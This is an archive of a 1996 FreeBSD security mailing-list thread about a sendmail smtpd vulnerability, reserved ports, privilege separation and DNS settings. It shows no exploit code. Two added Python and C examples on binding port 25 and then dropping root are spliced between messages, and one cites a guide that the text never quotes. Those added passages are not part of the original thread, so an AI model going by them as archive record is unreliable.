Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id XAA14836; Sun, 17 Nov 1996 23:15:12 -0800 (PST)
From: Don Lewis
Message-Id: <199611180715.XAA14836@salsa.gv.ssi1.com>
Date: Sun, 17 Nov 1996 23:15:12 -0800
In-Reply-To: "S(pork)" "Re: New sendmail bug..." (Nov 17, 9:39pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: "S(pork)" , Eric Allman
Subject: Re: New sendmail bug...
Cc: Igor Roshchin , Ollivier Robert , freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 17, 9:39pm, "S(pork)" wrote:
} Subject: Re: New sendmail bug...
} But if one does have to run 8.7.6 until they have time to breathe, does
} anyone know if the error that Igor and I are seeing compiling 8.7.6 from
} -stable can be avoided? I first patched with the 2 line setgid, setuid
} patch I saw on the list, then I grabbed what was in the current -stable
} source and got the same error as Igor. It compiled after deleting the
} line in main.c that I saw in the errors, and it seems to work, but
} reckless deletion scares me. I wonder what the line was for....
} > : > + vendor_daemon_setup(CurEnv);

It appears to be some sort of hook that only ConvexOS currently uses.
From conf.c in 8.8.3:

/*
**  VENDOR_DAEMON_SETUP -- special vendor setup needed for daemon mode
*/

void
vendor_daemon_setup(e)
	ENVELOPE *e;
{
#if SECUREWARE
	if (getluid() != -1)
	{
		usrerr("Daemon cannot have LUID");
		exit(EX_USAGE);
	}
#endif /* SECUREWARE */
}

--- Truck

From owner-freebsd-security Sun Nov 17 23:31:41 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA18718 for security-outgoing; Sun, 17 Nov 1996 23:31:41 -0800 (PST)
Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA18700; Sun, 17 Nov 1996 23:31:17 -0800 (PST)
Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id IAA09174; Mon, 18 Nov 1996 08:30:43 +0100 (MET)
To: Michael Smith
cc: imp@village.org (Warner Losh), newton@communica.com.au, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-reply-to: Your message of "Mon, 18 Nov 1996 14:05:04 +1030." <199611180335.OAA17231@genesis.atrad.adelaide.edu.au>
Date: Mon, 18 Nov 1996 08:30:43 +0100
Message-ID: <9172.848302243@critter.tfs.com>
From: Poul-Henning Kamp
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <199611180335.OAA17231@genesis.atrad.adelaide.edu.au>, Michael Smith writes:
>Warner Losh stands accused of saying:
>>
>> I don't buy this. You need to be able to create a mailbox of an
>> arbitrary user, and then write to that mailbox with that user's uid,
>> or to a shell of that user's uid. To do otherwise would introduce
>> other security problems, some of which have been beat to death in the
>> freebsd lists.
>>
>> What am I missing?
>
>mail.local.
>
>Mark's sense of warmth is perhaps slightly over-smug, but his point is
>valid. In fact, if it were possible to be non-root and bind to port 25,
>then sendmail could be run non-root in daemon mode and not be called from
>cron (which Mark omitted to mention).

What we REALLY need is a way for root to hand out certain privileges.

Imagine this:

	sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp`
	sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp`
	sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp`
	sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp`

This means that users with UID smtp can bind to socket 25 (aka smtp),
and so on.

Now sendmail NEVER needs to be root.

How's that for security ?

--
Poul-Henning Kamp           | phk@FreeBSD.ORG       FreeBSD Core-team.
http://www.freebsd.org/~phk | phk@login.dknet.dk    Private mailbox.
whois: [PHK]                | phk@ref.tfs.com       TRW Financial Systems, Inc.
Future will arrive by its own means, progress not so.
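The sysctl idea above is one answer to the question the thread keeps returning to (root is needed for the bind(2) on port 25 and for nothing after it). The conventional answer, which the Installation and Operation Guide quoted earlier describes for the mailer exec, is to bind while privileged and then give root up for good. The following Python program is an added example of that pattern; it is not code from the list thread, from sendmail or from FreeBSD. The user name "nobody", the default port and all function names are assumptions made for the example. Run as root it binds port 25 and drops to "nobody"; run unprivileged it binds an ephemeral port instead, so the same code path can still be exercised.

```python
"""Bind a low port while root, then drop root for good.

Added example (not from the FreeBSD list thread, sendmail or FreeBSD):
root is used only for the bind(2) on a port below 1024, and is then
discarded irrevocably.  The user name "nobody", the port and all
function names are assumptions made for this example.
"""
import os
import pwd
import socket

PRIVILEGED_PORT_MAX = 1023   # 1..1023 need root on traditional UNIX


def is_privileged_port(port):
    """True for ports only root may bind; 0 means 'pick an ephemeral port'."""
    return 0 < port <= PRIVILEGED_PORT_MAX


def current_ids():
    """Credentials the process is running with right now."""
    return {"uid": os.getuid(), "euid": os.geteuid(), "gid": os.getgid()}


def bind_listener(port, host=""):
    """Create the listening socket.  This is the only step that needs root."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((host, port))
    listener.listen(5)
    return listener


def drop_privileges(user):
    """Switch from root to `user` irrevocably and return the new ids.

    Order matters: supplementary groups, then gid, then uid.  setuid()
    goes last because once the uid is non-zero the other two calls are
    no longer permitted.  Called as root, setuid() changes the real,
    effective and saved uid, so there is no saved uid 0 to come back to.
    """
    pw = pwd.getpwnam(user)
    os.setgroups([pw.pw_gid])   # discard root's supplementary groups
    os.setgid(pw.pw_gid)
    os.setuid(pw.pw_uid)
    # Regaining root must now fail; if it succeeds the drop was not real.
    try:
        os.setuid(0)
    except PermissionError:
        return current_ids()
    raise RuntimeError("privilege drop is reversible; refusing to run")


def start_daemon(port, user="nobody"):
    """Bind first, then shed root if we have it.

    Returns the bound listener and the credentials the daemon now runs
    with, so the caller can confirm that euid is no longer 0.
    """
    listener = bind_listener(port)
    ids = drop_privileges(user) if os.geteuid() == 0 else current_ids()
    return listener, ids


if __name__ == "__main__":
    # Port 25 when started as root, an ephemeral port otherwise.
    want = 25 if os.geteuid() == 0 else 0
    sock, ids = start_daemon(want)
    print("listening on port %d as uid %d" % (sock.getsockname()[1], ids["euid"]))
    sock.close()
```

The check that `os.setuid(0)` fails is the part worth copying: a daemon that only calls `seteuid()` keeps a saved uid of 0 and can be talked back into root by any later bug, which is exactly the situation the thread is trying to get away from.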
From owner-freebsd-security Sun Nov 17 23:33:22 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA18912 for security-outgoing; Sun, 17 Nov 1996 23:33:22 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA18897 for ; Sun, 17 Nov 1996 23:33:04 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id XAA14862; Sun, 17 Nov 1996 23:31:33 -0800 (PST)
From: Don Lewis
Message-Id: <199611180731.XAA14862@salsa.gv.ssi1.com>
Date: Sun, 17 Nov 1996 23:31:33 -0800
In-Reply-To: Marc Slemko "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 17, 10:30pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Marc Slemko , Warner Losh
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: Mark Newton , freebsd-security@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 17, 10:30pm, Marc Slemko wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} I have a grand scheme for a program that is a frontend to things like:
}	- removing the setuid bit from programs you don't use, and
}	  giving you a nice explanation of what the effects are

I'd like to be able to do "make release" to get a binary release with
this already taken care of to make installation easier. I'd also like
the release to have unnecessary stuff like compilers and include files
removed.

--- Truck

From owner-freebsd-security Sun Nov 17 23:38:00 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA19379 for security-outgoing; Sun, 17 Nov 1996 23:38:00 -0800 (PST)
Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA19350; Sun, 17 Nov 1996 23:37:22 -0800 (PST)
Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id IAA09224; Mon, 18 Nov 1996 08:37:34 +0100 (MET)
To: newton@communica.com.au (Mark Newton)
cc: msmith@atrad.adelaide.edu.au (Michael Smith), imp@village.org, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-reply-to: Your message of "Mon, 18 Nov 1996 15:05:38 +1030."
             <9611180435.AA17191@communica.com.au>
Date: Mon, 18 Nov 1996 08:37:34 +0100
Message-ID: <9222.848302654@critter.tfs.com>
From: Poul-Henning Kamp
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

In message <9611180435.AA17191@communica.com.au>, Mark Newton writes:
>port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP
>ports less than 1024 can only be allocated by a privileged user. TCP/IP
>implementations on non-UNIX platforms disagree violently with this
>assumption, which makes the value of this "security" feature rather dubious.

Well, it's in the standard, so I wouldn't call it UNIX-centric.

I also think you have not quite grasped this feature at all.

What you can use it for is this:

	IFF i trust this machine AND the port is < 1024 THEN
		I know that I'm dealing with something the administrator set up.
	ELSE
		God knows.

If you don't trust the machine, and you shouldn't unless you know how
it's administrated, the port# is meaningless.

--
Poul-Henning Kamp           | phk@FreeBSD.ORG       FreeBSD Core-team.
http://www.freebsd.org/~phk | phk@login.dknet.dk    Private mailbox.
whois: [PHK]                | phk@ref.tfs.com       TRW Financial Systems, Inc.
Future will arrive by its own means, progress not so.

From owner-freebsd-security Sun Nov 17 23:49:06 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20103 for security-outgoing; Sun, 17 Nov 1996 23:49:06 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA20060 for ; Sun, 17 Nov 1996 23:48:40 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id XAA14898; Sun, 17 Nov 1996 23:48:23 -0800 (PST)
From: Don Lewis
Message-Id: <199611180748.XAA14898@salsa.gv.ssi1.com>
Date: Sun, 17 Nov 1996 23:48:22 -0800
In-Reply-To: roberto@keltia.freenix.fr (Ollivier Robert)
       "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 7:06am)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: roberto@keltia.freenix.fr (Ollivier Robert), freebsd-security@FreeBSD.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 18, 7:06am, Ollivier Robert wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} According to Don Lewis:
} > Qmail doesn't do all the ESMTP negotiation that sendmail does. It keeps
} > qmail simpler and less likely to be buggy, but not as functional. For
} > instance sendmail 8.7.x supports: 8BITMIME, SIZE, DSN, VERB, ONEX, but
} > whatever version of qmail I just checked only supports 8BITMIME and
} > PIPELINING. Sendmail 8.8.x adds ETRN.
}
} I don't think it handles 8BITMIME at all even if it announces it. Does it
} support rewriting from 8bit to 7bit and reverse ?

I think you may be right. I seem to recall from the discussions on
comp.mail.sendmail that qmail only announces this to keep sendmail from
doing an 8->7 rewrite. Other than that, qmail just sends 8 bits even if
it is talking to some crusty old mailer that strips off the eighth bit or
just goes berserk when it receives a message containing characters with
the high bit set.

} > Sendmail's support of UUCP isn't wonderful (mostly a problem of
} > getting DNS totally disabled). How well does qmail support UUCP?
}
} That's a common misunderstanding. UUCP support in sendmail is pretty good
} (see my other mail).

I would have been a lot happier in my UUCP email days if sendmail had
supported BSMTP (I think there was a version that did, but it wasn't the
one I was running).

--- Truck

From owner-freebsd-security Sun Nov 17 23:55:22 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20474 for security-outgoing; Sun, 17 Nov 1996 23:55:22 -0800 (PST)
Received: from offensive.communica.com.au (offensive-eth1.adl.communica.com.au [192.82.222.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA20394 for ; Sun, 17 Nov 1996 23:53:18 -0800 (PST)
Received: from communica.com.au (frenzy.communica.com.au [192.82.222.65]) by offensive.communica.com.au (8.7.6/8.7.3) with SMTP id SAA00388; Mon, 18 Nov 1996 18:21:37 +1030 (CST)
Received: by communica.com.au (4.1/SMI-4.1) id AA18891; Mon, 18 Nov 96 18:21:30 CDT
From: newton@communica.com.au (Mark Newton) Message-Id: <9611180751.AA18891@communica.com.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: phk@critter.tfs.com (Poul-Henning Kamp) Date: Mon, 18 Nov 1996 18:21:30 +1030 (CST) Cc: newton@communica.com.au, msmith@atrad.adelaide.edu.au, imp@village.org, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG In-Reply-To: <9222.848302654@critter.tfs.com> from "Poul-Henning Kamp" at Nov 18, 96 08:37:34 am X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Poul-Henning Kamp wrote:
> In message <9611180435.AA17191@communica.com.au>, Mark Newton writes:
> >port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP
> >ports less than 1024 can only be allocated by a privileged user. TCP/IP
> >implementations on non-UNIX platforms disagree violently with this
> >assumption, which makes the value of this "security" feature rather dubious.
>
> Well, it's on the standard, so I wouldn't call it UNIX-centric.

It's the standard in the UNIX world (that's why I called it UNIX-centric). non-UNIX implementations of TCP/IP don't even necessarily run on machines which support the concept of superuser, and out of those which do some don't restrict < 1024 to privileged users.

> I also think you have not quite grasped this feature at all.

I have grasped the feature; I know precisely what it is attempting to achieve. I just see it as a relic from days-gone-by when the only systems on the planet which ran TCP/IP were UNIX machines.

> IFF i trust this machine AND the port is < 1024 THEN
      ^^^^^^^^^^^^^^^^^^^^^^^^

This is the bit that breaks down on the Internet. If you don't trust the machine at the other end, all bets are off.

> If you don't trust the machine, and you shouldn't unless you know how
> it's administrated, the port# is meaningless.

Precisely. And I've never attempted to imply anything more or less than this.

This is just a diversion, btw. We now return you to your regularly scheduled Subject: lines :-)

- mark

--- Mark Newton Email: newton@communica.com.au Systems Engineer Phone: +61-8-8373-2523 Communica Systems WWW: http://www.communica.com.au

From owner-freebsd-security Sun Nov 17 23:57:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20649 for security-outgoing; Sun, 17 Nov 1996 23:57:03 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA20542; Sun, 17 Nov 1996 23:56:20 -0800 (PST) Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id IAA09369; Mon, 18 Nov 1996 08:56:18 +0100 (MET) To: Don Lewis cc: Marc Slemko , Warner Losh , Mark Newton , freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Sun, 17 Nov 1996 23:31:33 PST." <199611180731.XAA14862@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 08:56:18 +0100 Message-ID: <9367.848303778@critter.tfs.com>
From: Poul-Henning Kamp Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

In message <199611180731.XAA14862@salsa.gv.ssi1.com>, Don Lewis writes:
>On Nov 17, 10:30pm, Marc Slemko wrote:
>} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
>
>} I have a grand scheme for a program that is a frontend to things like:
>} - removing the setuid bit from programs you don't use, and
>} giving you a nice explanation of what the effects are
>
>I'd like to be able to do "make release" to get a binary release with
>this already taken care of to make installation easier. I'd also like
>the release to have unnecessary stuff like compilers and include files
>removed.

Well, look at /usr/src/release :-)

Actually I know you already are, thanks for the help so far!

-- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so.

From owner-freebsd-security Mon Nov 18 00:05:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA21221 for security-outgoing; Mon, 18 Nov 1996 00:05:12 -0800 (PST) Received: from sequent.kiae.su (sequent.kiae.su [193.125.152.6]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id AAA21107 for ; Mon, 18 Nov 1996 00:04:24 -0800 (PST) Received: by sequent.kiae.su id AA26657 (5.65.kiae-2 ); Mon, 18 Nov 1996 11:59:29 +0400 Received: by sequent.KIAE.su (UUMAIL/2.0); Mon, 18 Nov 96 11:59:28 +0400 Received: (from ache@localhost) by nagual.ru (8.8.2/8.8.2) id KAA00591; Mon, 18 Nov 1996 10:49:48 +0300 (MSK) Message-Id: <199611180749.KAA00591@nagual.ru> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from "Marc Slemko" at "Nov 17, 96 09:18:29 pm" To: marcs@znep.com (Marc Slemko) Date: Mon, 18 Nov 1996 10:49:48 +0300 (MSK) Cc: freebsd-security@FreeBSD.org
From: Андрей Чернов (Andrey A. Chernov) Organization: self X-Class: Fast X-Mailer: ELM [version 2.4ME+ PL28 (25)] Mime-Version: 1.0 Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

> Incorrect. Sendmail still attempts a lookup for something, I think it is
> the local hostname, for each piece of mail it processes. Last I checked,
> this could NOT be disabled without recompiling sendmail. Modifying your
> config file or adding a service.switch file does not stop it.

Of course you must use

FEATURE(nocanonify)
FEATURE(nodns)

in addition to /etc/service.switch, I just did not mention obvious things.

> On Mon, 18 Nov 1996, [KOI8-R] Андрей Чернов wrote:
>
> > > Sendmail's support of UUCP isn't wonderful (mostly a problem of
> > > getting DNS totally disabled). How well does qmail support UUCP?
> >
> > It is possible to totally disable DNS via
> >
> > /etc/service.switch:
> > # To disable DNS search for sendmail
> > hosts files

-- Andrey A. Chernov http://www.nagual.ru/~ache/

From owner-freebsd-security Mon Nov 18 00:29:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA22206 for security-outgoing; Mon, 18 Nov 1996 00:29:58 -0800 (PST) Received: from procert.cert.dfn.de (procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA22196; Mon, 18 Nov 1996 00:29:37 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.3/8.8.3) with ESMTP id JAA25369; Mon, 18 Nov 1996 09:30:27 +0100 (MET)
From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.3/8.8.3) id JAA15522; Mon, 18 Nov 1996 09:30:25 +0100 (MET) Message-Id: <199611180830.JAA15522@tiger.cert.dfn.de> Subject: Re: New sendmail bug... To: spork@super-g.com (S) Date: Mon, 18 Nov 1996 09:30:25 +0100 (MET) Cc: eric@sendmail.org, igor@alecto.physics.uiuc.edu, roberto@keltia.freenix.fr, freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org In-Reply-To: from "S" at Nov 17, 96 09:39:11 pm Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- S wrote: > > But if one does have to run 8.7.6 until they have time to breath, does > anyone know if the error that Igor and I are seeing compiling 8.7.6 from [...] That's simply wrong. sendmail 8.7 - 8.8.2 is affected (which includes sendmail 8.7.6). Install 8.8.3 to fix the bug. Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 
30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMpAengQmfXmOCknRAQGqjwP9Fw/SroRZ/+IjZygCpjNOdugjY7R1/W42 o4VdoakPR803j5+VpJDxOFvizckhQ+6JAAJZU0DMTE+Fq9BLQaDqsVIJE5C85I0s Xw9jF7cGJLcKXiNSUXLLooMdfac+lHFLNE3svLZ/F4rpCP21TWhaiIBsnxHXlY5d s8+Md6kQTDI= =qIVB -----END PGP SIGNATURE----- From owner-freebsd-security Mon Nov 18 00:41:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA22775 for security-outgoing; Mon, 18 Nov 1996 00:41:06 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA22763; Mon, 18 Nov 1996 00:40:47 -0800 (PST) Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id JAA09423; Mon, 18 Nov 1996 09:41:08 +0100 (MET) To: newton@communica.com.au (Mark Newton) cc: msmith@atrad.adelaide.edu.au, imp@village.org, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Mon, 18 Nov 1996 18:21:30 +1030." <9611180751.AA18891@communica.com.au> Date: Mon, 18 Nov 1996 09:41:07 +0100 Message-ID: <9421.848306467@critter.tfs.com> 
From: Poul-Henning Kamp Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

In message <9611180751.AA18891@communica.com.au>, Mark Newton writes:
>Poul-Henning Kamp wrote:
>
> > In message <9611180435.AA17191@communica.com.au>, Mark Newton writes:
> > >port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP
> > >ports less than 1024 can only be allocated by a privileged user. TCP/IP
> > >implementations on non-UNIX platforms disagree violently with this
> > >assumption, which makes the value of this "security" feature rather dubious.
> >
> > Well, it's on the standard, so I wouldn't call it UNIX-centric.
>
>It's the standard in the UNIX world (that's why I called it UNIX-centric).
>non-UNIX implementations of TCP/IP don't even necessarily run on machines
>which support the concept of superuser, and out of those which do some
>don't restrict < 1024 to privileged users.

Read the host-requirements RFC and become wiser.

> > I also think you have not quite grasped this feature at all.
>
>I have grasped the feature; I know precisely what it is attempting to
>achieve. I just see it as a relic from days-gone-by when the only systems
>on the planet which ran TCP/IP were UNIX machines.

Well, you still haven't grasped it. I say it again, because I'm sure you didn't: Read the host-requirements RFC and become wiser.

> > > IFF i trust this machine AND the port is < 1024 THEN
> ^^^^^^^^^^^^^^^^^^^^^^^^
>This is the bit that breaks down on the Internet. If you don't trust
>the machine at the other end, all bets are off.

Of course. That is rather evident. But it so happens that I do trust some machines, or rather the people behind the machines, and then this feature comes handy.

-- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so.
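The mechanism the two of them are arguing over, as an added C illustration written for this archive (it is not code from sendmail, FreeBSD, or any poster): the kernel's reserved-port rule, the bind-while-root-then-drop-root sequence that rule forces on a port-25 daemon, and PHK's trust test applied to a peer's source port. It assumes a BSD-socket platform (FreeBSD or Linux). Uid/gid 65534 as the unprivileged target when run as root is an assumption, and the peer-port check takes "trusted host" as a caller-supplied flag, because, as both sides agree, the port number means nothing without that trust.

```c
/* privport.c: added example for this thread, not sendmail or FreeBSD code.
 * Shows the reserved-port rule, bind-then-drop-root, and PHK's trust test. */
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <grp.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* The BSD convention under discussion: local ports 1..1023 may only be
 * bound by the superuser, so a listener there was set up by the admin. */
int is_reserved_port(unsigned port)
{
    return port >= 1 && port < 1024;
}

/* PHK's rule: IFF the peer host is trusted AND its source port is reserved,
 * the peer process was started by that host's administrator. The trust flag
 * comes from the caller (a host list, for instance); it is not derived here. */
int peer_is_admin_setup(int trusted_host, unsigned peer_port)
{
    return trusted_host && is_reserved_port(peer_port);
}

/* Try to bind a TCP socket to 127.0.0.1:port. Returns 0 on success, else
 * the errno (EACCES for a reserved port without privilege). */
int try_bind(unsigned short port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return errno;
    struct sockaddr_in sin;
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sin.sin_port = htons(port);
    int rc = bind(fd, (struct sockaddr *)&sin, sizeof sin) == 0 ? 0 : errno;
    close(fd);
    return rc;
}

/* Give up root for good once the reserved port is bound: supplementary
 * groups first, then gid, then uid, then prove root cannot be regained.
 * Returns 0, or an errno value if any step fails. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(1, &gid) != 0)
        return errno;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return errno;
    /* A saved uid of 0 left behind would make the drop reversible. */
    if (uid != 0 && (setuid(0) == 0 || seteuid(0) == 0))
        return EPERM;
    return 0;
}

int main(void)
{
    int rc = try_bind(25);
    printf("bind(25) as uid %u: %s\n", (unsigned)geteuid(),
           rc ? strerror(rc) : "ok");
    rc = try_bind(0);   /* kernel picks an ephemeral port, never reserved */
    printf("bind(0): %s\n", rc ? strerror(rc) : "ok");

    /* sendmail's situation: the bind above must happen as root, after which
     * nothing the daemon does needs root. 65534 is an assumed unprivileged id. */
    uid_t tuid = geteuid() == 0 ? 65534 : getuid();
    gid_t tgid = geteuid() == 0 ? 65534 : getgid();
    rc = drop_privileges(tuid, tgid);
    printf("drop_privileges: %s, now uid %u\n",
           rc ? strerror(rc) : "ok", (unsigned)geteuid());

    printf("peer port 513 from trusted host: %d, from untrusted host: %d\n",
           peer_is_admin_setup(1, 513), peer_is_admin_setup(0, 513));
    return 0;
}
```

Run as an ordinary user, bind(25) fails with EACCES while bind(0) succeeds; run as root the bind succeeds and drop_privileges() leaves a process that can no longer call setuid(0), which is the state a port-25 daemon should reach before it parses a single SMTP command. The order matters: groups, then gid, then uid, because once the uid is no longer 0 the process cannot change its group list, and a forgotten setgroups() leaves group 0 (wheel) behind.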
From owner-freebsd-security Mon Nov 18 01:18:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA25007 for security-outgoing; Mon, 18 Nov 1996 01:18:55 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA25001; Mon, 18 Nov 1996 01:18:44 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id BAA15007; Mon, 18 Nov 1996 01:18:36 -0800 (PST) 
From: Don Lewis Message-Id: <199611180918.BAA15007@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 01:18:36 -0800 In-Reply-To: Michael Smith "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 7:11pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Michael Smith Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: chat@freebsd.org, security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

On Nov 18, 7:11pm, Michael Smith wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} (This has nothing to do with security. Moved to -chat where such drool
} belongs)

Actually, it is security related (see my response to (b)):

} Don Lewis stands accused of saying:
} >
} > I'd like to be able to do "make release" to get a binary release with
} > this already taken care of to make installation easier. I'd also like
} > the release to have unnecessary stuff like compilers and include files
} > removed.
}
} a) You can fiddle 'make release' to do anything you want, after all, you
} have the source, right?

Yes, but it's a lot harder than I'd like.

} b) Removing the compiler and "unnecessary" stuff may be less useful than
} you think. But if you're determined to force people to use the GENERIC
} kernel, then go ahead and do it. I'm sure _someone_ will love you,
